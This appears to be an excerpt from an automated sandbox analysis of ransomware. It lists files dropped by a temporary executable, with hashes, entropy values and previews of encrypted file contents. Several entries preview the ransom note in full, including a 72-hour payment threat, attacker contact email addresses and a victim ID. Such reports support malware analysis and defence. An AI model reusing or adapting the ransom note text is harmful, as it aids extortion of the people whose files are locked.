                                                                                                    Preview:.....(IS.L..@q.}.Ux\.u.l.'....$....n...]31..gi{...O..2....Y..i...K.;.0..-U-.....|.l..r........T..7.1K..r...%..H(p.\..kL^M..v.i.....yOW.=.g4N...-G.D.f....n...}.y.B.g....1..*].Z...........+9..p...y..xLx.y..c.m?.C..N9.A.[..b...)`s.B.G_r$.1CU..EK...a..^y..W..L..Ul.!3...3..].Ng..:..Y..e....w....-....S....0vWp.!l?Q..@..U..m>...L.U.N8...R.z..5|N..:(.....4V..C#I..._#.....4\.zmUKz..U......!.g.a.....[f..M=).4..th'.re.Y...y.M.j...W1.....!'@......$.!#vJ...t.6..b.c...|..E.0.r....9E..$...).....,..8.r@./...<w..P.....I...6.rv.k ..b..uL!...U.....A.E.,a..r".3...LU.z.V.C.t.:?w.x}...YC..0...*..*......M.|=.d...gH...r....&.Mal....@.P....`B....{h.,./....Gk*./.t..........f....z.^L..Q... cP.Qode.y.......-.B.....i.......R..S..V...K.y..{[....J....v..C.....,..s8..=.T.=... .z.S[....x....)#......'x....yl:y.*........F4..K'../...."..*..`..09..6$..o.}...H......qF.a.....tFru.....-F~...tL.6..gC...............v.r...thV.s..mET..we..P.Q.3...y.n........9d.............i..e
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.859146072650734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:a2fO9kM5TnrNv66ZuDquxnFi+MyYEzVNG1oYofSMIm:akO9p5TJXuDquNjMyvYFYSMx
                                                                                                    MD5:A1A7E95F43D50B37D381A5105A007BF8
                                                                                                    SHA1:FAA57DCE084F2AF040652B84D4908ADAA14E9BFB
                                                                                                    SHA-256:6286605038B071AE99715453BB62DFBCF2EE2417E8FDC40DEFDA63D940AA5B58
                                                                                                    SHA-512:D8F003E29BC0252B5B6BFEA9266BEE8F96347D9F3A15104454C4CC7257940C0BC1699E78D4D0076FB721D1CBF60A7D5362282BBF79B7F8BB20125DE94A309649
                                                                                                    Malicious:false
                                                                                                    Preview:.....]...M..$.[>.+.y.W.X..v.N[..@Y..AQ.Vk...2...._.2............X.z......3...i.Z.*.2..3n,.!...Nl...n5yPr6.OhT...WQ..[.Y@..h...1u.vB.2......ti.....@.N...+......-q...ot.<....X|......s.{..&.d....].?....$...~..+.Y.....V. .......tO@.X......qhUT.h.4m._..@..^..r....`......tM...m..s..S... ..k.ns...Vc.IM.S.\v.[.|4;... .8k.*..'.c.b...&.k"O.fN.......Y).4kP..p]5!_....i.dl;.2.S'"..z.F.jS[.:.8.Jn.B.t..e;...iV.2..T.^L+..!y"....VgR..(...).9.d.........{a&..w.....a.....u."....d_.*s>.f...0..HV.+.t.p;....[osM.yL..?q'...u)9.B}E.I..Q....L..`).!...g...w6..Rr...#..`.b..ye.....4.K..QK!...+.(.!.zk../....vz.Qie..#.>](.M.....8._...{.So.ZP=.3.c........B.Q.....H..To...{..3Y8.d.bc.....m0........o..v.T(.!.`8 ..GJ4,.#.'v..3<./h[w..qg@.g.. F.2...N2K@c.m...2Kk3$.O.:WE............z.%...J...5..1...!8D..:.a5.v..lP.Tp...\?i......{.........P....{..C...+.tY.....\....yuY.j(.U..._.dc..r.hO.Sz.1....$9\~.......4.7.W]eab.".q..J.x.w."X....g.)M...CL.|.Q.B...Ti]...)9s.sv...jF...G#..V")+
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.859146072650734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:a2fO9kM5TnrNv66ZuDquxnFi+MyYEzVNG1oYofSMIm:akO9p5TJXuDquNjMyvYFYSMx
                                                                                                    MD5:A1A7E95F43D50B37D381A5105A007BF8
                                                                                                    SHA1:FAA57DCE084F2AF040652B84D4908ADAA14E9BFB
                                                                                                    SHA-256:6286605038B071AE99715453BB62DFBCF2EE2417E8FDC40DEFDA63D940AA5B58
                                                                                                    SHA-512:D8F003E29BC0252B5B6BFEA9266BEE8F96347D9F3A15104454C4CC7257940C0BC1699E78D4D0076FB721D1CBF60A7D5362282BBF79B7F8BB20125DE94A309649
                                                                                                    Malicious:false
                                                                                                    Preview:.....]...M..$.[>.+.y.W.X..v.N[..@Y..AQ.Vk...2...._.2............X.z......3...i.Z.*.2..3n,.!...Nl...n5yPr6.OhT...WQ..[.Y@..h...1u.vB.2......ti.....@.N...+......-q...ot.<....X|......s.{..&.d....].?....$...~..+.Y.....V. .......tO@.X......qhUT.h.4m._..@..^..r....`......tM...m..s..S... ..k.ns...Vc.IM.S.\v.[.|4;... .8k.*..'.c.b...&.k"O.fN.......Y).4kP..p]5!_....i.dl;.2.S'"..z.F.jS[.:.8.Jn.B.t..e;...iV.2..T.^L+..!y"....VgR..(...).9.d.........{a&..w.....a.....u."....d_.*s>.f...0..HV.+.t.p;....[osM.yL..?q'...u)9.B}E.I..Q....L..`).!...g...w6..Rr...#..`.b..ye.....4.K..QK!...+.(.!.zk../....vz.Qie..#.>](.M.....8._...{.So.ZP=.3.c........B.Q.....H..To...{..3Y8.d.bc.....m0........o..v.T(.!.`8 ..GJ4,.#.'v..3<./h[w..qg@.g.. F.2...N2K@c.m...2Kk3$.O.:WE............z.%...J...5..1...!8D..:.a5.v..lP.Tp...\?i......{.........P....{..C...+.tY.....\....yuY.j(.U..._.dc..r.hO.Sz.1....$9\~.......4.7.W]eab.".q..J.x.w."X....g.)M...CL.|.Q.B...Ti]...)9s.sv...jF...G#..V")+
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.860218066670778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:21FqcU1dQEocp/ccv79hO/1aU5Nn50vOAXi5FmlsPIj+ZD8XvDs2UrmQWV:21EcU1dH9cm1Ur50vOAXi57Z8XvoNaT
                                                                                                    MD5:AA5853D52FEFE7743E5272F676715BB0
                                                                                                    SHA1:E5D118BA02EFCA9D0FA510890A535C872C464332
                                                                                                    SHA-256:8BF558348100045A2E76AD034D371E7576CA28E8C9B448560259404AB32ECB14
                                                                                                    SHA-512:95ED05F062B3732B42EB2092B079C101429BB4957383BADAD8B921DB87292E7D7DA01E6E08C9C95E83E568B67223C1AEEDF0D77F72704E3A37E652E828E12076
                                                                                                    Malicious:false
                                                                                                    Preview:.@?|1......C..Z.mVy{.0....Dp%...690.2}R..b.B..t.?.. ...{.'X..; }.Q)..;.9....S...].........:-J}..Jk...A..4.2.w....Uh......f....`E>..q).hn2..~..P......d.|Z......d.n..v.>8..dQR.`..........V.w..l8...Zp.b./,tq....9.)...X......!u[vz*Oj.........f..!..#Qb:..|"...o........Lv.g.l.g..L....N.}M..].1.v1g.F..^.67.`Z...^....n6..~,g......*).J..D.....M..L..uz..;.:q.|.)_fP..R_1.BBl(;zQT..$.3........]..-...X.=r.I%.|...e.8.......WKG|..A.t^w"...]...+.=b...:........{....%.......?Uy..Q.[.20..y......%-.T...4<@<x..O...l....4.^..lM]j&.vc...>.-G...4E...EP....=UR.g'.:..[..g.G.5..|.....J.GW6Z.....!....=G.U.bW.LeF....C..d_.A.`...N;t.._Fr..2%.'.s.....2.4.6.d..2...A$pq...B.2/o...&x..tL...]$.r.....EIx.WN...z..x.\.T.f..n.......jf...D^.{<..k....}...xK......{hK.5..'..X$/.c..9nIv.5..>.<$.o(.T.15......;....Fa...?H\..Y......,A.qQ....]J.`@i.^.<.y.a...Z.c...k....,4.23..o...+d..3Zr%.D...yn.G.......ru.v.....&.J..nV.u....LFnQ..~.._..<.......... .e.H..(.....<~..!Or."....<.....8'sM..z.B?...k.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.860218066670778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:21FqcU1dQEocp/ccv79hO/1aU5Nn50vOAXi5FmlsPIj+ZD8XvDs2UrmQWV:21EcU1dH9cm1Ur50vOAXi57Z8XvoNaT
                                                                                                    MD5:AA5853D52FEFE7743E5272F676715BB0
                                                                                                    SHA1:E5D118BA02EFCA9D0FA510890A535C872C464332
                                                                                                    SHA-256:8BF558348100045A2E76AD034D371E7576CA28E8C9B448560259404AB32ECB14
                                                                                                    SHA-512:95ED05F062B3732B42EB2092B079C101429BB4957383BADAD8B921DB87292E7D7DA01E6E08C9C95E83E568B67223C1AEEDF0D77F72704E3A37E652E828E12076
                                                                                                    Malicious:false
                                                                                                    Preview:.@?|1......C..Z.mVy{.0....Dp%...690.2}R..b.B..t.?.. ...{.'X..; }.Q)..;.9....S...].........:-J}..Jk...A..4.2.w....Uh......f....`E>..q).hn2..~..P......d.|Z......d.n..v.>8..dQR.`..........V.w..l8...Zp.b./,tq....9.)...X......!u[vz*Oj.........f..!..#Qb:..|"...o........Lv.g.l.g..L....N.}M..].1.v1g.F..^.67.`Z...^....n6..~,g......*).J..D.....M..L..uz..;.:q.|.)_fP..R_1.BBl(;zQT..$.3........]..-...X.=r.I%.|...e.8.......WKG|..A.t^w"...]...+.=b...:........{....%.......?Uy..Q.[.20..y......%-.T...4<@<x..O...l....4.^..lM]j&.vc...>.-G...4E...EP....=UR.g'.:..[..g.G.5..|.....J.GW6Z.....!....=G.U.bW.LeF....C..d_.A.`...N;t.._Fr..2%.'.s.....2.4.6.d..2...A$pq...B.2/o...&x..tL...]$.r.....EIx.WN...z..x.\.T.f..n.......jf...D^.{<..k....}...xK......{hK.5..'..X$/.c..9nIv.5..>.<$.o(.T.15......;....Fa...?H\..Y......,A.qQ....]J.`@i.^.<.y.a...Z.c...k....,4.23..o...+d..3Zr%.D...yn.G.......ru.v.....&.J..nV.u....LFnQ..~.._..<.......... .e.H..(.....<~..!Or."....<.....8'sM..z.B?...k.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.82455674286558
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gtajUjR1mZHtpk1e1f0uGtvblNazHfx2D2JumZotdjMeUXAoCn+cQYv:qKo0ZHtGe1MuEbCzBDZE8NHcV
                                                                                                    MD5:AED4FADBAF45892DF28D737B9E985B28
                                                                                                    SHA1:BBAEC48753895544B4AA2C9B82163587B566FD18
                                                                                                    SHA-256:E299DFBA2B36CBE30987DDD76A0813A32877CE4EDE4F97A87E1E873898E74E5F
                                                                                                    SHA-512:D1052C13A671001C5C617C34EA4953CB27076786963FF1A237FF4DBA843CEBEF4E7CF075BE6581F21FBBC2EA4052F59006CFAE200122765A9A55A4507E0EF3D9
                                                                                                    Malicious:false
                                                                                                    Preview:YgH=..M!.m....Q.W..E......1N#t.....##......T{.q.YZ..2..]S.r.w....Ek.^.I..9..G...`..c..:-....c.....wjF:.'....<.o..._..%<7.uuP...ye.$v......&.l}w.eV..E...o[.lK.r=us.........A..N{S....q&.o.Ds....Na..u...[.|...g...9.Z^y.K-o..P..]_.q.....6$...%B.#..`.........t..At4.n):R...<=..y.!R\.v...@.......M...{..x.>).hsg'.G..Aaw.......O../.Fd.....r...\.CAk..^.o!L%$..u.w..7.i...w.n...d.8....tkl....y.Sh............M.b6..c.S/....(}E'.S..&.^..fJ..`.4....X.!f.A........0o.@..d.Fs.?.f[?.....#.x........f.. &.Y..O..Cs%.........Gwz.. d.no.v....k..T.b...eg..9'......rAC.....@....,"].a...'h......g...C....gwS7+RJ.%y.........7..6....P.3....F..2'.E:..6.....n.8.1........^.-?..u....jw.|......J..!..'..x. F.....5.w...j8..b......v..)}4.&..[j......[..9|Z\]7FA.y.\..uW..... .B.mF..\...<..;...F..u...`.nh._.kd..4mL...r..N. ..Y.T.@ $.yZU4.r.#.9.....N..Y....2...."^d.....r..%.L.S......2.|V0......v....n"....t.@6.G.,U.#.g.2Mx.....a..j.W./.GuQ.....x.....A:..u...- .....u[...BO...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.82455674286558
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gtajUjR1mZHtpk1e1f0uGtvblNazHfx2D2JumZotdjMeUXAoCn+cQYv:qKo0ZHtGe1MuEbCzBDZE8NHcV
                                                                                                    MD5:AED4FADBAF45892DF28D737B9E985B28
                                                                                                    SHA1:BBAEC48753895544B4AA2C9B82163587B566FD18
                                                                                                    SHA-256:E299DFBA2B36CBE30987DDD76A0813A32877CE4EDE4F97A87E1E873898E74E5F
                                                                                                    SHA-512:D1052C13A671001C5C617C34EA4953CB27076786963FF1A237FF4DBA843CEBEF4E7CF075BE6581F21FBBC2EA4052F59006CFAE200122765A9A55A4507E0EF3D9
                                                                                                    Malicious:false
                                                                                                    Preview:YgH=..M!.m....Q.W..E......1N#t.....##......T{.q.YZ..2..]S.r.w....Ek.^.I..9..G...`..c..:-....c.....wjF:.'....<.o..._..%<7.uuP...ye.$v......&.l}w.eV..E...o[.lK.r=us.........A..N{S....q&.o.Ds....Na..u...[.|...g...9.Z^y.K-o..P..]_.q.....6$...%B.#..`.........t..At4.n):R...<=..y.!R\.v...@.......M...{..x.>).hsg'.G..Aaw.......O../.Fd.....r...\.CAk..^.o!L%$..u.w..7.i...w.n...d.8....tkl....y.Sh............M.b6..c.S/....(}E'.S..&.^..fJ..`.4....X.!f.A........0o.@..d.Fs.?.f[?.....#.x........f.. &.Y..O..Cs%.........Gwz.. d.no.v....k..T.b...eg..9'......rAC.....@....,"].a...'h......g...C....gwS7+RJ.%y.........7..6....P.3....F..2'.E:..6.....n.8.1........^.-?..u....jw.|......J..!..'..x. F.....5.w...j8..b......v..)}4.&..[j......[..9|Z\]7FA.y.\..uW..... .B.mF..\...<..;...F..u...`.nh._.kd..4mL...r..N. ..Y.T.@ $.yZU4.r.#.9.....N..Y....2...."^d.....r..%.L.S......2.|V0......v....n"....t.@6.G.,U.#.g.2Mx.....a..j.W./.GuQ.....x.....A:..u...- .....u[...BO...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.826145775472628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cO7tyoHRfAQKPnzQWiTy8l0NrSG0j90OhILbZDweX6TuTNre+VoiDZ:cocmfzKPn+yBJSG0GCSYWzVp
                                                                                                    MD5:DDCBC8B7B36FEDEEAAF6C218B919AFF9
                                                                                                    SHA1:67EF2E33B9AF0AE75F5BA965B8F72AF0A7EFFCF8
                                                                                                    SHA-256:9CAABC5589E9E61E22FF942F2AC47D77DF07227667E616444C4F77044164D55A
                                                                                                    SHA-512:8AEC3EDD66E3A42339441A1CC74BC96C9C1549E4388DEA43E42ADF6D02F7609F3AD85B99EF842F6523D78577020F00C16BFF4CA28400515CAAF477C302A449BB
                                                                                                    Malicious:false
                                                                                                    Preview:z....}o.2.......\...v....:..>..<6.p.e..h.M....Qa%.p4P..9...Z.,...E....f....b...\.R.85..e........l......f....6..'%....[_.a.!fLM.$.8...%.&].%q..jQ...i.\.......;.Fzv.,...p..|...y.,B..{......R.<F.2/...G.....s..=....DR..$.)....6Wj.>...f..*..a.*.hb.O......:...rJ...-..36l......ud.$....!.lZ.Xw.6t...........].h...#.........tW.!D.g..:....z`.../-V$.S.u.<...-SS....1F5Z...F.|..4..n..XR.D.-...... U..<....../`..?:\(....V..*R.t.Y....(}..|R..>....J"NG<..A..x.2..(O.QM.T..g@M...V|....w.7$r...z....P.G...d...RT.{.?.M..7.4..q....<.y..$.4....S.....@...k..ds.....w...N;r.......S.j......0..k.'.......G.d_...`..*?.w.s..=...mJ&P.M'....."...,.7n.:dxK@.E."..OX.]v.7..R...o.]....../0:....|..q.."|.J.3~rR<.........L^.........+..|.r.p.i.....]".)....+._#|.L.7Xq.^4.v>z>vLI..M1...~o.O)....R}.a.A.7C...PZ.&.h.t'..38.P.o..M.x..I......5.6.L.Qd.T...6.O~......M...I....t#.09.6..).fq..h=PI......Xj......y....Y..V{\..^..a8.;9.#-..x.71.nz.}n..I.@.5...t..J.?....`..y.3. }.-.SH.f|.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.826145775472628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cO7tyoHRfAQKPnzQWiTy8l0NrSG0j90OhILbZDweX6TuTNre+VoiDZ:cocmfzKPn+yBJSG0GCSYWzVp
                                                                                                    MD5:DDCBC8B7B36FEDEEAAF6C218B919AFF9
                                                                                                    SHA1:67EF2E33B9AF0AE75F5BA965B8F72AF0A7EFFCF8
                                                                                                    SHA-256:9CAABC5589E9E61E22FF942F2AC47D77DF07227667E616444C4F77044164D55A
                                                                                                    SHA-512:8AEC3EDD66E3A42339441A1CC74BC96C9C1549E4388DEA43E42ADF6D02F7609F3AD85B99EF842F6523D78577020F00C16BFF4CA28400515CAAF477C302A449BB
                                                                                                    Malicious:false
                                                                                                    Preview:z....}o.2.......\...v....:..>..<6.p.e..h.M....Qa%.p4P..9...Z.,...E....f....b...\.R.85..e........l......f....6..'%....[_.a.!fLM.$.8...%.&].%q..jQ...i.\.......;.Fzv.,...p..|...y.,B..{......R.<F.2/...G.....s..=....DR..$.)....6Wj.>...f..*..a.*.hb.O......:...rJ...-..36l......ud.$....!.lZ.Xw.6t...........].h...#.........tW.!D.g..:....z`.../-V$.S.u.<...-SS....1F5Z...F.|..4..n..XR.D.-...... U..<....../`..?:\(....V..*R.t.Y....(}..|R..>....J"NG<..A..x.2..(O.QM.T..g@M...V|....w.7$r...z....P.G...d...RT.{.?.M..7.4..q....<.y..$.4....S.....@...k..ds.....w...N;r.......S.j......0..k.'.......G.d_...`..*?.w.s..=...mJ&P.M'....."...,.7n.:dxK@.E."..OX.]v.7..R...o.]....../0:....|..q.."|.J.3~rR<.........L^.........+..|.r.p.i.....]".)....+._#|.L.7Xq.^4.v>z>vLI..M1...~o.O)....R}.a.A.7C...PZ.&.h.t'..38.P.o..M.x..I......5.6.L.Qd.T...6.O~......M...I....t#.09.6..).fq..h=PI......Xj......y....Y..V{\..^..a8.;9.#-..x.71.nz.}n..I.@.5...t..J.?....`..y.3. }.-.SH.f|.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845870970984708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Os2CbZEIcLpX3SKpQ8xdhRI2nHlvJJnUtEzYWsRfN8jKHyo2QsC6U+X2eg:OriK9PAUFfyEzYWsRV8jKHlJuU6A
                                                                                                    MD5:9195287E62C04A64B51983F23C5E0AAD
                                                                                                    SHA1:8EEAD511966DBAFFD3127F7C46900F6DBE8BAEC2
                                                                                                    SHA-256:6369A236FA3AE353C2EFBF1FEE2737EAC9425753547533CB55145B564448820E
                                                                                                    SHA-512:1ABC528258A61C5FDFADEF0DD8664688DC0975204F2DCA113FC1118EEAFD86D859D7F4397208AA9784D8F4208576A8537B839625E814741CD01C66A6F58705C8
                                                                                                    Malicious:false
                                                                                                    Preview:$O...."....zz..h-:|.O..HgL.U..P.*}m....d..y.......=m)r.(......,..E.$a.t...G.=Q..j...aH.H~_.u.V.9.....I.z..;xn.Z.O.p..lC..ppf...zB...8........"...|.........7.;..E...i.7/U..,.xq.....6>iF..-...x...%v... -1.LV.e....#.1..:.l....F<.Bo.....LI.)a..i.../....u....i.^9....j.mu....\d]sy..%..dh..Q.:.t.....u.Ox..B.5.s..,t."....4 ....C....75.J.S.......T....V....<...?~v.*...+...:%x.b.t..$...%....Z.n.h...J.....-..J[..N.c...$"s.4>.7.Hk..z... ....|.Q..i..hY..f..//.~..~..W!d.V...+....M..DpJ....7.Y9..J..Vu..vO....P..F..3...l.z..".z...q.A.\n.},......Z...7n..~.T.T.]h.H..0g.l....c...Nu.dP....1.....\....I.[G.*;....*6...$..@+,d......*|..u._......X'JBL.ZK`.......\..G..)......a6O....T.fx.6.v8D.=.Atj..k........v%X.i.n. .l.....!.g6.K....@.....}1l...Q*m...6....g.:..l.".p.s/..;(.......e..9<M.y.X.<r.........K.BY.N....qn........%@.I..V.T...uu..Q1.4..X..]F....0<..PVe.C.t.E...Jd.O?].30......f...Pw^]..yy....J...2\nO...&...YK.@A..+.|.}.....12..-w.5km.E...2.[Ne.9.b.l
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845870970984708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Os2CbZEIcLpX3SKpQ8xdhRI2nHlvJJnUtEzYWsRfN8jKHyo2QsC6U+X2eg:OriK9PAUFfyEzYWsRV8jKHlJuU6A
                                                                                                    MD5:9195287E62C04A64B51983F23C5E0AAD
                                                                                                    SHA1:8EEAD511966DBAFFD3127F7C46900F6DBE8BAEC2
                                                                                                    SHA-256:6369A236FA3AE353C2EFBF1FEE2737EAC9425753547533CB55145B564448820E
                                                                                                    SHA-512:1ABC528258A61C5FDFADEF0DD8664688DC0975204F2DCA113FC1118EEAFD86D859D7F4397208AA9784D8F4208576A8537B839625E814741CD01C66A6F58705C8
                                                                                                    Malicious:false
                                                                                                    Preview:$O...."....zz..h-:|.O..HgL.U..P.*}m....d..y.......=m)r.(......,..E.$a.t...G.=Q..j...aH.H~_.u.V.9.....I.z..;xn.Z.O.p..lC..ppf...zB...8........"...|.........7.;..E...i.7/U..,.xq.....6>iF..-...x...%v... -1.LV.e....#.1..:.l....F<.Bo.....LI.)a..i.../....u....i.^9....j.mu....\d]sy..%..dh..Q.:.t.....u.Ox..B.5.s..,t."....4 ....C....75.J.S.......T....V....<...?~v.*...+...:%x.b.t..$...%....Z.n.h...J.....-..J[..N.c...$"s.4>.7.Hk..z... ....|.Q..i..hY..f..//.~..~..W!d.V...+....M..DpJ....7.Y9..J..Vu..vO....P..F..3...l.z..".z...q.A.\n.},......Z...7n..~.T.T.]h.H..0g.l....c...Nu.dP....1.....\....I.[G.*;....*6...$..@+,d......*|..u._......X'JBL.ZK`.......\..G..)......a6O....T.fx.6.v8D.=.Atj..k........v%X.i.n. .l.....!.g6.K....@.....}1l...Q*m...6....g.:..l.".p.s/..;(.......e..9<M.y.X.<r.........K.BY.N....qn........%@.I..V.T...uu..Q1.4..X..]F....0<..PVe.C.t.E...Jd.O?].30......f...Pw^]..yy....J...2\nO...&...YK.@A..+.|.}.....12..-w.5km.E...2.[Ne.9.b.l
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
